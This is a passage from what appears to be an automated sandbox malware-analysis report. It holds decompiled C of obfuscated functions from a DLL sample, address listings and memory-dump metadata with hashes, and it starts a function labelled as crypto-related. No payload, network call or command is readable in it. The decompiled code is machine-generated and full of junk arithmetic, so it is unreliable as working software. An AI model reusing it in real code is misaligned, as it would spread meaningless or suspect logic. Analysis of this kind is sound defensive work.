				_t847 = _t484 % ( *(_t875 + 0x1e93) & 0x000000ff);
				 *(_t883 + 0x24) = _t847;
				 *_t847 =  *_t847 - 1;
				_t487 =  *0x6d55d594; // 0x0
				if( *((intOrPtr*)(_t487 + ( *0x6d55d5c0 & 0x0000ffff) * 4)) == ( *( *_t847 + _t854 + 2) & 0x000000ff)) {
					L32:
					_t694 =  *(_t883 + 0x14);
					_t681 = _t681 - 1;
					 *(_t883 + 0x20) = _t694 *  *0x6d55d57c -  *(_t883 + 0x20) & 0x0000ffff;
					 *(_t883 + 0x14) = _t694 + 1;
					_t696 =  *0x6d55d5e0; // 0x0
					 *((char*)(_t696 + _t875)) = _t681 % 0xff7 -  *((intOrPtr*)(_t696 + _t875));
					_t856 =  *0x6d55d5e4; // 0x0
					asm("cdq");
					 *0x6d55d5a0 = ( *0x6d55d588 & 0x0000ffff |  *(_t883 + 0x74) & 0x0000ffff) %  *0x6d55d5a0;
					 *0x6d55d5c0 = _t856 % ( *0x6d55d5c0 & 0x0000ffff);
					 *0x6d55d5e4 = _t856 - 1;
					 *(_t883 + 0x13) = 0x1377 % ( *(_t883 + 0x13) & 0x000000ff);
					 *(_t883 + 0x78) =  *(_t883 + 0x20);
					L21:
					_t792 =  *(_t883 + 0x18);
					L22:
					_t503 =  *(_t883 + 0x1c) + 1;
					_t858 = _t503 & 0x0000ffff;
					 *(_t883 + 0x1c) = _t503;
					 *(_t883 + 0x44) = _t792 & 0x0000ffff;
					asm("cdq");
					 *( *(_t883 + 0x38) + _t858 * 4) = 0x1393 /  *(_t883 + 0x44) %  *( *(_t883 + 0x38) + _t858 * 4);
					_t702 =  *0x6d55d598; // 0x0
					_t796 =  *(_t883 + 0x2c);
					_t703 = _t702 + 1;
					_t510 = ( *0x6d55d5c0 & 0x0000ffff) * 6;
					 *0x6d55d598 = _t703;
					__eflags = ( *(_t510 + _t796 + 2) & 0x0000ffff) -  *((intOrPtr*)(0x7c + _t703 * 4));
					if(( *(_t510 + _t796 + 2) & 0x0000ffff) >  *((intOrPtr*)(0x7c + _t703 * 4))) {
						 *((char*)(_t858 + _t875)) = 0x1710 / ( *(_t883 + 0x74) & 0x0000ffff) -  *((intOrPtr*)(_t858 + _t875));
						_t516 =  *0x6d55d584; // 0x0
						 *0x6d55d58c = 0x1b3d;
						_t859 = _t858 * 3;
						asm("cdq");
						_t708 =  *(_t859 +  *(_t883 + 0x68)) & 0x000000ff;
						__eflags = (0x773 - ( *(_t516 +  *(_t883 + 0x6c)) & 0x000000ff)) % _t708;
						 *(_t859 +  *(_t883 + 0x68)) = 0x773 / _t708;
						L34:
						_t520 =  *0x6d55d5bc; // 0x0
						asm("cdq");
						 *(_t520 +  *_t847 * 4) = ( *((intOrPtr*)( *(_t883 + 0x34) + 0x45e0)) - 0x00000045 & 0x0000020d) /  *(_t520 +  *_t847 * 4);
						_t526 =  *0x6d55d5b8; // 0x0
						_t527 = _t526 + 1;
						 *0x6d55d5b8 = _t527;
						__eflags =  *0x6d55d57c - _t527; // 0x0
						if(__eflags != 0) {
							_t528 =  *0x6d55d5d4; // 0x0
							_t713 =  *((intOrPtr*)( *(_t883 + 0x2c) + _t528 * 2));
							 *0x6d55d5d4 = _t528 - 1;
							__eflags = _t713 -  *0x6d55d588; // 0x0
							if(__eflags > 0) {
								_t848 =  *(_t883 + 0x78) & 0x0000ffff;
								_t860 =  *(_t883 + 0x24);
								asm("cdq");
								 *((short*)( *(_t883 + 0x30) + 4 + _t681 * 2)) = (_t848 | 0x000019d6) / 0x155b -  *((intOrPtr*)( *(_t883 + 0x30) + 4 + _t681 * 2));
								 *_t860 =  *_t860 + 1;
								 *(0x7c +  *_t860 * 4) =  *(0x7c +  *_t860 * 4) |  *(_t875 + 0x28e) & 0x000000ff | 0x00001b01;
								 *( *((intOrPtr*)(_t883 + 0x70)) + ( *(_t883 + 0x1c) & 0x0000ffff) * 2) = ( *( *(_t883 + 0x4c) + 0x3d1e) & 0x0000ffff) / ( *(_t681 + _t875 + 1) & 0x000000ff) ^  *( *(_t883 + 0x3c) + 0x84f) & 0x000000ff;
								_t875 =  *((intOrPtr*)(_t883 + 0x60));
								 *((short*)( *(_t883 + 0x30) + 2 + _t681 * 2)) =  *(_t883 + 0x64) -  *((intOrPtr*)( *(_t883 + 0x30) + 2 + _t681 * 2));
								_t546 =  *0x6d55d5a8; // 0x0
								_t861 =  *_t860 * 0xc;
								_t724 =  *0x6d55d5bc; // 0x0
								_t454 = _t861 + _t724 + 0x74;
								 *_t454 =  *(_t861 + _t724 + 0x74) &  *(_t546 + _t848 * 4) /  *0x6d55d584;
								__eflags =  *_t454;
							}
						} else {
							 *_t847 =  *_t847 + 1;
							 *((intOrPtr*)(0x7c +  *(_t883 + 0x14) * 4)) = ( *( *_t847 + _t875 + 4) & 0x000000ff) -  *((intOrPtr*)(0x7c +  *(_t883 + 0x14) * 4)) + 0x8f5;
							_t862 =  *0x6d55d5e0; // 0x0
							_t863 = _t862 - 1;
							 *0x6d55d5e0 = _t863;
							 *(_t863 +  *(_t883 + 0x6c)) = ( *(( *(_t883 + 0x78) & 0x0000ffff) +  *(_t883 + 0x68)) & 0x000000ff) / ( *(_t863 +  *(_t883 + 0x6c)) & 0x000000ff);
						}
						_t715 =  *(( *(_t883 + 0x1c) & 0x0000ffff) + _t875) & 0x000000ff;
						L39:
						return ( *(_t883 + 0x74) & 0x0000ffff) - _t715;
					}
					_t681 = _t681 - 1;
					 *((char*)(_t858 + _t875)) =  *(_t883 + 0x13) -  *((intOrPtr*)(_t858 + _t875));
					_push(0x34d);
					_push(_t681);
					 *(_t883 + 0x38) =  *(_t883 + 0x28) - 1;
					_t564 =  *0x6d55d5b4; // 0x0
					E6D50135E(_t564 -  *((intOrPtr*)( *(_t883 + 0x44) + _t858 * 4)), 0x510,  *(_t883 + 0x8c) & 0x0000ffff,  *(_t681 * 3 +  *(_t883 + 0x78)) & 0x000000ff ^ 0x00000d91,  *(_t883 + 0x28) - 1,  *(_t883 + 0x44) & 0x00000efa);
					_t567 =  *0x6d55d590; // 0x0
					_t883 = _t883 + 0x20;
					 *(_t883 + 0x20) = _t567;
					__eflags = _t567 -  *(_t883 + 0x28);
					if(_t567 ==  *(_t883 + 0x28)) {
						goto L34;
					}
					_t733 = _t567 << 4;
					__eflags = _t733;
					 *(_t883 + 0x44) = _t733;
					 *(_t883 + 0x40) = _t847 + _t567 * 4;
					do {
						_t569 =  *0x6d55d59c; // 0x0
						_t570 = _t569 + 1;
						 *0x6d55d59c = _t570;
						 *( *(_t883 + 0x30) + 0x20 +  *_t847 * 2) = (_t570 & 0x0000ffff) / ( *( *(_t883 + 0x30) + 0x20 +  *_t847 * 2) & 0x0000ffff);
						_t737 =  *0x6d55d570; // 0x0
						_t865 =  *(_t883 + 0x44);
						 *(_t865 + _t737) =  *(_t865 + _t737) *  *(_t883 + 0x20);
						_t738 =  *0x6d55d5ac; // 0x0
						_t739 = _t738 - 1;
						 *0x6d55d5ac = _t739;
						asm("cdq");
						_t875 =  *((intOrPtr*)(_t883 + 0x60));
						 *( *(_t883 + 0x68) + 0xf + _t739 * 4) =  *(_t883 + 0x20) %  *( *(_t883 + 0x38) + 0x48 + _t681 * 4) |  *(_t883 + 0x20);
						_t740 =  *(_t883 + 0x40);
						_t813 =  *( *_t847 + _t875 + 0x17) & 0x000000ff;
						__eflags = _t813 -  *_t740;
						if(_t813 >  *_t740) {
							goto L29;
						}
						_t878 =  *(_t883 + 0x2c);
						_t849 =  *(_t883 + 0x48) & 0x0000ffff;
						_t582 =  *0x6d55d5ac; // 0x0
						do {
							_t681 = _t681 + 1;
							 *(_t878 + _t681 * 2) =  *(_t878 + _t681 * 2) ^ (_t582 |  *0x6d55d574);
							_t584 =  *0x6d55d5ac; // 0x0
							_t582 = _t584 ^ _t849;
							_t813 = _t813 + 1;
							 *0x6d55d5ac = _t582;
							__eflags = _t813 -  *_t740;
						} while (_t813 <=  *_t740);
						_t875 =  *((intOrPtr*)(_t883 + 0x60));
						_t847 =  *(_t883 + 0x24);
						L29:
						_t580 =  *(_t883 + 0x20) + 1;
						 *(_t883 + 0x44) = _t865 + 0x10;
						 *(_t883 + 0x20) = _t580;
						 *(_t883 + 0x40) = _t740 + 4;
						__eflags = _t580 -  *(_t883 + 0x28);
					} while (_t580 !=  *(_t883 + 0x28));
					goto L34;
				}
				_t585 =  *0x6d55d598; // 0x0
				if( *((intOrPtr*)( *((intOrPtr*)(_t883 + 0x70)) + _t585 * 2)) >=  *((intOrPtr*)( *((intOrPtr*)(_t883 + 0x70)) + 0x3c + ( *0x6d55d588 & 0x0000ffff) * 2))) {
					goto L32;
				}
				_t587 =  *(_t883 + 0x20);
				 *(_t883 + 0x78) = _t587;
				_t588 = _t587 & 0x0000ffff;
				 *(_t883 + 0x50) = _t588;
				if(( *(_t588 + _t875) & 0x000000ff) < 0xf00) {
					_t792 =  *(_t883 + 0x18);
					 *(0xa4 +  *_t847 * 4) = _t792 & 0x0000ffff;
					goto L22;
				}
				_t591 =  *0x6d55d5b0; // 0x0
				 *0x6d55d5a0 = _t591 *  *0x6d55d5a0;
				_t815 =  *_t847;
				if( *(_t883 + 0x40) != ( *(_t815 + _t875) & 0x000000ff)) {
					L7:
					_t596 =  *0x6d55d5a8; // 0x0
					_t681 = _t681 - 1;
					 *0x6d55d5b0 = ( *( *(_t883 + 0x6c) + 0x9be) & 0x000000ff) % 0xdac;
					_t818 =  *(_t883 + 0x64);
					 *(_t681 * 4) =  *(_t681 * 4) &  *(_t596 + 0x1d00);
					 *0x6d55d5b4 =  *0x6d55d5b4 & (( *(_t854 + _t681) & 0x000000ff) - 0x00001c33 |  *( *(_t883 + 0x3c) + _t681) & 0x000000ff);
					__eflags =  *0x6d55d5b4;
					_t749 =  *((intOrPtr*)(_t883 + 0x70));
					L8:
					 *(_t883 + 0x40) = _t681;
					if( *(_t883 + 0x20) > 0x1ea7) {
						L16:
						_t601 =  *0x6d55d5d4; // 0x0
						_t867 =  *0x6d55d5a4; // 0x0
						 *(_t883 + 0x64) = _t818 + 1;
						_push(0x18c3);
						asm("cdq");
						_t683 = _t681 - 1;
						_t606 =  *0x6d55d598; // 0x0
						 *(_t883 + 0x7c) = _t683;
						_push( *( *((intOrPtr*)(_t883 + 0x70)) + _t606 * 2) & 0x0000ffff);
						_t608 = E6D50135E(0x19ba,  *0x6d55d5e0, _t867 & _t818 + 0x00000001, 0x76f,  *(_t749 + 0xe + _t601 * 2) & 0x0000ffff |  *(_t681 * 3 +  *(_t883 + 0x68)) & 0x000000ff, 0x1383 %  *0x218c);
						_t869 =  *(_t883 + 0x34);
						_t880 =  *(_t883 + 0x8c);
						 *0x6d55d598 = _t608;
						_push( *((intOrPtr*)(_t883 + 0x70)));
						 *0x6d55d5b4 = (( *( *((intOrPtr*)(_t883 + 0x5c)) + _t869 + 6) & 0x000000ff) - ( *(_t880 + 0x3f) & 0x000000ff)) /  *0x6d55d5b4;
						_t613 =  *0x6d55d590; // 0x0
						_t614 = _t613 + 1;
						 *(_t883 + 0x38) = _t869 - 1;
						 *0x6d55d590 = _t614;
						 *( *(_t883 + 0x54) + _t683 * 2) = _t614;
						_t615 =  *(_t683 + _t880) & 0x000000ff;
						_t754 =  *0x6d55d58a; // 0x0
						 *(_t883 + 0x6c) = _t615;
						 *0x6d55d58a = _t754 + 1;
						 *(_t883 + 0x64) = _t615 -  *0x6d55d574;
						 *(_t883 + 0x88) =  *(_t883 + 0x88) + 1;
						_t619 =  *0x6d55d5c0; // 0x0
						 *0x6d55d5c0 = _t619 + 0xffff;
						_t624 =  *0x6d55d5ac; // 0x0
						_push(0x1925 - ( *( *(_t883 + 0x50) +  *( *(_t883 + 0x48)) * 2) & 0x0000ffff));
						asm("cdq");
						_t872 =  *(_t883 + 0x78);
						_t681 =  *(_t883 + 0xb4);
						_t630 = E6D507D3B(_t872,  *(_t883 + 0x88),  *(_t883 + 0x8c), _t754 & 0x000000ff, _t681, ( *(_t847 + _t683 * 4) |  *(_t883 + 0x88) + 0x00000001) & 0x0000ffff,  *( *((intOrPtr*)(_t883 + 0x70)) + 0x2f26) & 0x0000ffff ^  *(((_t619 + 0x0000ffff & 0x0000ffff) + 1) * 0xc +  *(_t883 + 0x48)),  *( *((intOrPtr*)(_t883 + 0x94)) + _t624 * 2) & 0x0000ffff,  *(_t883 + 0x54) % 0x823,  *((intOrPtr*)( *(_t883 + 0x7c) + 0x1c +  *(_t883 + 0x9c) * 4)));
						_t826 =  *(_t883 + 0x68);
						_t883 = _t883 + 0x50;
						 *(_t883 + 0x48) = _t630 & 0x0000ffff;
						_t875 =  *((intOrPtr*)(_t883 + 0x60));
						 *(_t883 + 0x18) = 0x00001c9f / (_t826 & 0x0000ffff) & 0x0000ffff;
						_t635 =  *0x6d55d57c; // 0x0
						_t768 =  *(_t883 + 0x20) ^ ( *(_t635 + _t875) & 0x000000ff) + _t872;
						_t829 = _t768 & 0x0000ffff;
						 *(_t883 + 0x78) = _t768;
						 *(_t883 + 0x44) = _t829;
						__eflags = _t829 -  *(_t883 + 0x14);
						if(_t829 <  *(_t883 + 0x14)) {
							L20:
							_t847 =  *(_t883 + 0x24);
							goto L21;
						}
						_t769 =  *(_t883 + 0x64);
						 *(_t883 + 0x54) =  *(_t883 + 0x13) & 0x000000ff;
						 *(_t883 + 0x50) =  *(_t883 + 0x74) & 0x0000ffff;
						 *(_t883 + 0x40) = _t681 * 3;
						_t874 = _t829 * 3 +  *(_t883 + 0x68);
						__eflags = _t874;
						do {
							 *( *(_t883 + 0x38) + _t681 * 4) =  *( *(_t883 + 0x38) + _t681 * 4) |  *(_t883 + 0x54) -  *0x6d55d598 + _t829 | 0x0000068d;
							 *_t874 = _t829 -  *_t874;
							_t874 = _t874 + 3;
							asm("cdq");
							_t832 =  *(_t883 + 0x40);
							_t648 =  *(_t883 + 0x50) / _t769 -  *((intOrPtr*)(_t832 + _t875));
							_t769 = _t769 - 1;
							 *((char*)(_t832 + _t875)) = _t648;
							_t833 =  *(_t883 + 0x44);
							 *0x6d55d5a4 =  *0x6d55d5a4 & _t833;
							_t829 = _t833 + 1;
							 *(_t883 + 0x44) = _t829;
							__eflags = _t829 -  *(_t883 + 0x14);
						} while (_t829 >=  *(_t883 + 0x14));
						 *(_t883 + 0x64) = _t769;
						goto L20;
					}
					_t847 =  *(_t883 + 0x24);
					if( *((intOrPtr*)( *(_t883 + 0x2c) + 6 + _t681 * 2)) < ( *( *(_t883 + 0x6c) + _t681 + 8) & 0x000000ff)) {
						goto L16;
					}
					_t681 = _t681 + 1;
					_t892 =  *0x6d55d580 - _t681; // 0x0
					if(_t892 < 0) {
						L15:
						 *0x6d55d58a =  *0x6d55d58a - 1;
						goto L21;
					}
					_t834 =  *(_t883 + 0x74);
					 *(_t883 + 0x74) = _t834 + 1;
					if( *((intOrPtr*)( *_t847 * 0xc + _t847)) != (_t834 & 0x0000ffff)) {
						goto L15;
					}
					_t681 =  *(_t883 + 0x40);
					_t652 =  *0x6d55d594; // 0x0
					if( *((intOrPtr*)(_t652 + _t681 * 4)) == 0x13a) {
						goto L15;
					}
					asm("cdq");
					_t655 =  *0x6d55d588; // 0x0
					 *(_t883 + 0x14) = 0x1c9e %  *(_t883 + 0x14);
					_t837 =  *(_t883 + 0x1c);
					 *((intOrPtr*)((_t837 & 0x0000ffff) + _t875)) =  *((intOrPtr*)((_t837 & 0x0000ffff) + _t875)) + (_t655 & 0x00000011);
					_t838 = _t837 + 1;
					_t657 =  *0x6d55d5bc; // 0x0
					 *(_t883 + 0x1c) = _t838;
					 *0x6d55d5d8 =  *0x6d55d5d8 |  *((intOrPtr*)(_t657 + 0x2814)) - 0x00001c33 &  *0x6d55d5b0;
					_t661 = _t681;
					_t681 = _t681 - 1;
					_t895 =  *0x6d55d5dc - _t661; // 0x0
					if(_t895 == 0) {
						goto L21;
					}
					_t839 = _t838 & 0x0000ffff;
					_t663 =  *0x6d55d578; // 0x0
					 *0x6d55d5a0 = ( *(_t839 +  *(_t883 + 0x6c)) & 0x000000ff ^  *(_t663 + _t854 + 1) & 0x000000ff) -  *0x6d55d5a0;
					_t715 =  *(_t839 + _t875) & 0x000000ff;
					goto L39;
				}
				_t665 =  *0x6d55d5a8; // 0x0
				if( *((intOrPtr*)(_t665 + _t815 * 4)) >  *(_t883 + 0x64)) {
					goto L7;
				}
				_t666 =  *0x6d55d5ac; // 0x0
				_t667 = _t666 + 1;
				 *0x6d55d5ac = _t667;
				if( *((intOrPtr*)( *(_t883 + 0x34) + ( *(_t883 + 0x1c) & 0x0000ffff) * 4)) <= ( *(_t667 + _t875 + 7) & 0x000000ff)) {
					goto L7;
				}
				_t669 =  *0x6d55d5bc; // 0x0
				_t777 =  *0x6d55d5e0; // 0x0
				 *0x6d55d5a4 = ( *((intOrPtr*)(_t669 + _t681 * 4)) -  *(_t883 + 0x40)) %  *0x6d55d5a4;
				_t818 =  *(_t883 + 0x64);
				 *( *(_t883 + 0x34) + _t777 * 4) =  *( *(_t883 + 0x34) + _t777 * 4) & 0x000019cf - _t818;
				_t778 =  *0x6d55d598; // 0x0
				_t875 =  *((intOrPtr*)(_t883 + 0x60));
				 *((char*)(_t778 + _t854)) = 0xb0;
				_t749 =  *((intOrPtr*)(_t883 + 0x70));
				 *((short*)( *((intOrPtr*)(_t883 + 0x70)) + 4 + _t681 * 2)) =  *((intOrPtr*)(0x7c + _t681 * 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t883 + 0x70)) + 4 + _t681 * 2));
				goto L8;
			}

















































































































            0x6d5061bf
            0x6d5061c4
            0x6d5061c9
            0x6d5061ce
            0x6d5061d3
            0x6d5061d9
            0x6d5061ef
            0x6d5061f4
            0x6d5061f8
            0x6d5061fd
            0x6d506201
            0x6d506205
            0x6d506209
            0x6d50620d
            0x6d50620e
            0x6d50620f
            0x6d506213
            0x6d506238
            0x6d506246
            0x6d50624d
            0x6d506252
            0x6d506258
            0x6d50625c
            0x6d506269
            0x6d50626d
            0x6d506272
            0x6d50627e
            0x6d50628b
            0x6d50628f
            0x6d506293
            0x6d506298
            0x6d5062a2
            0x6d5062a6
            0x6d5062ba
            0x6d5062be
            0x6d5062c1
            0x6d5062c6
            0x6d5062c9
            0x6d5062cb
            0x6d5062cf
            0x6d5062df
            0x6d5062e7
            0x6d506906
            0x6d506906
            0x6d506922
            0x6d506923
            0x6d50692b
            0x6d50692f
            0x6d506938
            0x6d50694b
            0x6d506951
            0x6d506961
            0x6d506971
            0x6d50697f
            0x6d50698c
            0x6d506990
            0x6d506747
            0x6d506747
            0x6d50674b
            0x6d50674f
            0x6d506750
            0x6d506753
            0x6d506761
            0x6d506770
            0x6d506773
            0x6d50677c
            0x6d506782
            0x6d506786
            0x6d506787
            0x6d50678a
            0x6d506795
            0x6d50679c
            0x6d5069b1
            0x6d5069b4
            0x6d5069b9
            0x6d5069c3
            0x6d5069d5
            0x6d5069d6
            0x6d5069da
            0x6d5069e0
            0x6d5069e3
            0x6d5069e5
            0x6d5069ff
            0x6d506a02
            0x6d506a04
            0x6d506a09
            0x6d506a0a
            0x6d506a0f
            0x6d506a15
            0x6d506a65
            0x6d506a6e
            0x6d506a73
            0x6d506a78
            0x6d506a7f
            0x6d506a85
            0x6d506a91
            0x6d506a9a
            0x6d506aa8
            0x6d506aad
            0x6d506abd
            0x6d506af1
            0x6d506afe
            0x6d506b07
            0x6d506b0c
            0x6d506b11
            0x6d506b14
            0x6d506b23
            0x6d506b23
            0x6d506b23
            0x6d506b23
            0x6d506a17
            0x6d506a17
            0x6d506a36
            0x6d506a3d
            0x6d506a47
            0x6d506a4d
            0x6d506a5d
            0x6d506a5d
            0x6d506b2e
            0x6d506b32
            0x6d506b42
            0x6d506b42
            0x6d5067a9
            0x6d5067ae
            0x6d5067bb
            0x6d5067c1
            0x6d5067c8
            0x6d5067e6
            0x6d5067f4
            0x6d5067f9
            0x6d5067fe
            0x6d506801
            0x6d506805
            0x6d506809
            0x00000000
            0x00000000
            0x6d506814
            0x6d506814
            0x6d506817
            0x6d50681b
            0x6d50681f
            0x6d50681f
            0x6d50682b
            0x6d50682d
            0x6d506847
            0x6d50684c
            0x6d506852
            0x6d50685e
            0x6d506861
            0x6d50686b
            0x6d50686c
            0x6d506872
            0x6d50687f
            0x6d506883
            0x6d506889
            0x6d50688d
            0x6d506892
            0x6d506894
            0x00000000
            0x00000000
            0x6d50689a
            0x6d50689e
            0x6d5068a1
            0x6d5068a6
            0x6d5068ac
            0x6d5068ad
            0x6d5068b2
            0x6d5068b7
            0x6d5068b9
            0x6d5068ba
            0x6d5068bf
            0x6d5068bf
            0x6d5068c3
            0x6d5068c7
            0x6d5068cb
            0x6d5068d2
            0x6d5068d3
            0x6d5068da
            0x6d5068de
            0x6d5068e2
            0x6d5068e2
            0x00000000
            0x6d5068ec
            0x6d5062f1
            0x6d506306
            0x00000000
            0x00000000
            0x6d50630c
            0x6d506311
            0x6d506316
            0x6d506319
            0x6d506326
            0x6d5068f3
            0x6d5068fa
            0x00000000
            0x6d5068fa
            0x6d50632c
            0x6d506338
            0x6d50633d
            0x6d506347
            0x6d5063d8
            0x6d5063ec
            0x6d5063f1
            0x6d5063f2
            0x6d5063f8
            0x6d506402
            0x6d50641d
            0x6d50641d
            0x6d506423
            0x6d506427
            0x6d50642c
            0x6d506435
            0x6d506514
            0x6d506514
            0x6d50651a
            0x6d506522
            0x6d506536
            0x6d506546
            0x6d506547
            0x6d50654e
            0x6d506553
            0x6d50655c
            0x6d506570
            0x6d506575
            0x6d50657b
            0x6d506582
            0x6d50658b
            0x6d5065ac
            0x6d5065b1
            0x6d5065b6
            0x6d5065b7
            0x6d5065bb
            0x6d5065c0
            0x6d5065c4
            0x6d5065c8
            0x6d5065ce
            0x6d5065dd
            0x6d5065ea
            0x6d5065f6
            0x6d506605
            0x6d506612
            0x6d50662d
            0x6d50664e
            0x6d506660
            0x6d506665
            0x6d50666b
            0x6d506683
            0x6d506688
            0x6d50668c
            0x6d506692
            0x6d5066a2
            0x6d5066ae
            0x6d5066b2
            0x6d5066be
            0x6d5066c1
            0x6d5066c4
            0x6d5066c9
            0x6d5066cd
            0x6d5066d1
            0x6d506743
            0x6d506743
            0x00000000
            0x6d506743
            0x6d5066d8
            0x6d5066dc
            0x6d5066e7
            0x6d5066f1
            0x6d5066f5
            0x6d5066f5
            0x6d5066f9
            0x6d50670e
            0x6d506717
            0x6d506719
            0x6d50671c
            0x6d50671f
            0x6d506723
            0x6d506726
            0x6d506727
            0x6d50672a
            0x6d50672e
            0x6d506734
            0x6d506735
            0x6d506739
            0x6d506739
            0x6d50673f
            0x00000000
            0x6d50673f
            0x6d50644d
            0x6d506451
            0x00000000
            0x00000000
            0x6d506457
            0x6d506458
            0x6d50645e
            0x6d506509
            0x6d506509
            0x00000000
            0x6d506509
            0x6d506467
            0x6d50646f
            0x6d506476
            0x00000000
            0x00000000
            0x6d50647c
            0x6d506480
            0x6d50648c
            0x00000000
            0x00000000
            0x6d506493
            0x6d506498
            0x6d50649f
            0x6d5064a3
            0x6d5064aa
            0x6d5064ad
            0x6d5064ae
            0x6d5064b3
            0x6d5064c8
            0x6d5064ce
            0x6d5064d0
            0x6d5064d1
            0x6d5064d7
            0x00000000
            0x00000000
            0x6d5064e1
            0x6d5064e8
            0x6d5064fa
            0x6d506500
            0x00000000
            0x6d506500
            0x6d50634d
            0x6d506359
            0x00000000
            0x00000000
            0x6d50635b
            0x6d506364
            0x6d50636c
            0x6d506379
            0x00000000
            0x00000000
            0x6d50637b
            0x6d506382
            0x6d50639e
            0x6d5063a4
            0x6d5063aa
            0x6d5063b0
            0x6d5063b6
            0x6d5063bd
            0x6d5063c0
            0x6d5063d1
            0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e69754dd361af066caf9046e6b26e4ccf0d93c79d032087aa8031fe99889be54
            • Instruction ID: 61ca81288e2d52b53f9d50eafc8b4b0c06f302e515238787edb861f2e40b38ab
            • Opcode Fuzzy Hash: e69754dd361af066caf9046e6b26e4ccf0d93c79d032087aa8031fe99889be54
            • Instruction Fuzzy Hash: 9C5234755083908FCB16CF29C090A6ABBF1FB8A304F15496EF8DAC7761D778A941CB52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D5169D9 Relevance: .6, Instructions: 580COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 80%
            			E6D5169D9() {
				signed int _t379;
				signed int _t380;
				signed int _t391;
				signed int _t396;
				short _t397;
				signed int _t398;
				intOrPtr _t401;
				intOrPtr _t404;
				signed int _t405;
				signed int _t406;
				signed int _t409;
				intOrPtr _t411;
				intOrPtr _t416;
				signed int _t423;
				signed short _t428;
				intOrPtr _t435;
				intOrPtr _t441;
				intOrPtr _t442;
				void* _t446;
				signed int _t448;
				signed int _t449;
				signed int _t455;
				intOrPtr _t460;
				signed int _t463;
				signed int _t464;
				signed char _t467;
				signed char _t468;
				intOrPtr _t470;
				signed int _t484;
				signed int _t489;
				signed int _t496;
				signed short _t498;
				signed short _t499;
				signed int _t506;
				signed int _t507;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t520;
				signed int _t523;
				signed int _t529;
				signed char _t530;
				signed char _t531;
				signed int _t539;
				signed int _t542;
				intOrPtr _t544;
				signed int _t549;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				signed int _t566;
				signed int _t572;
				signed int _t575;
				signed int _t577;
				signed int _t578;
				signed int* _t579;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int* _t621;
				signed int _t622;
				signed int _t623;
				signed int _t624;
				signed int _t625;
				intOrPtr _t634;
				signed int _t635;
				intOrPtr _t648;
				signed int* _t658;
				intOrPtr _t665;
				signed int _t666;
				signed int* _t668;
				signed int _t675;
				signed int _t676;
				signed int* _t686;
				signed int* _t691;
				intOrPtr _t692;
				signed int _t695;
				signed int _t697;
				intOrPtr _t705;
				signed int _t707;
				signed int _t709;
				signed int* _t710;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t718;
				signed int* _t721;
				signed int _t722;
				intOrPtr _t725;
				signed int* _t728;
				signed short _t729;
				signed short _t730;
				intOrPtr _t731;
				signed int _t732;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				intOrPtr _t744;
				signed short _t745;
				void* _t748;
				void* _t749;
				void* _t750;
				void* _t754;
				void* _t758;

				 *(_t748 + 0x14) = 0x1680;
				 *0x6d55d5c0 =  *0x6d55d5c0 + 0xffff;
				_t379 =  *0x6d55d58c; // 0x0
				_t380 = _t379 - 1;
				 *0x6d55d58c = _t380;
				 *(_t748 + 0x24) = _t380;
				 *(_t748 + 0x1c) =  *0x6d55d5d0 & 0x0000ffff &  *(_t748 + 0x5c) & 0x0000ffff;
				 *(_t748 + 0x40) =  *0x6d55d578 & 0x0000ffff;
				_t544 =  *((intOrPtr*)(_t748 + 0x48));
				_t732 =  *(_t748 + 0x58);
				 *(_t748 + 0x2c) = 0x1ca6 %  *0x6d55d580;
				 *(_t748 + 0x34) = _t732;
				_t709 = _t732;
				 *(_t748 + 0x18) = _t732;
				 *(_t748 + 0x38) =  *(_t544 + (_t732 + _t732) * 8);
				 *(_t748 + 0x30) =  *0x6d55d59c & 0x0000ffff;
				_t391 =  *0x6d55d5cc; // 0x0
				 *(_t748 + 0x3c) = _t732;
				_t733 = _t732 + 1;
				_t691 =  *0x6d55d5b4; // 0x0
				 *(_t748 + 0x28) = _t691;
				 *( *((intOrPtr*)(_t748 + 0x4c)) + _t733 * 4) = _t391 %  *0x6d55d5a4;
				 *0x6d55d5e4 = ( *0x6d55d59c & 0x0000ffff |  *0x6d55d5c0 & 0x0000ffff) &  *0x6d55d584;
				 *(_t748 + 0x58) = _t733;
				 *(_t748 + 0x10) = _t691;
				_t396 =  *0x6d55d5b4; // 0x0
				 *((intOrPtr*)( *0x9e1 * 0xc +  *((intOrPtr*)(_t748 + 0x4c)))) =  *((intOrPtr*)( *0x9e1 * 0xc +  *((intOrPtr*)(_t748 + 0x4c)))) + _t396;
				_t648 =  *((intOrPtr*)(_t748 + 0x54));
				_t397 =  *0x6d55d58c; // 0x0
				 *((short*)(_t709 * 6 + _t648)) = _t397;
				_t398 =  *0x6d55d598; // 0x0
				_t566 =  *0x6d55d5cc; // 0x0
				 *(_t709 +  *_t691 * 4) = _t566 -  *((intOrPtr*)(_t544 + 0x6860)) |  *(_t648 + _t398 * 2) & 0x0000ffff;
				_t710 = _t691;
				_t401 =  *0x6d55d5a0; // 0x0
				_t750 = _t401 -  *0x6d55d5d4; // 0x0
				if(_t750 == 0 ||  *((intOrPtr*)(_t648 +  *_t710 * 8)) <=  *(_t748 + 0x5c)) {
					if( *((intOrPtr*)( *(_t748 + 0x24) + _t733 * 4)) !=  *(_t748 + 0x2c) + 1) {
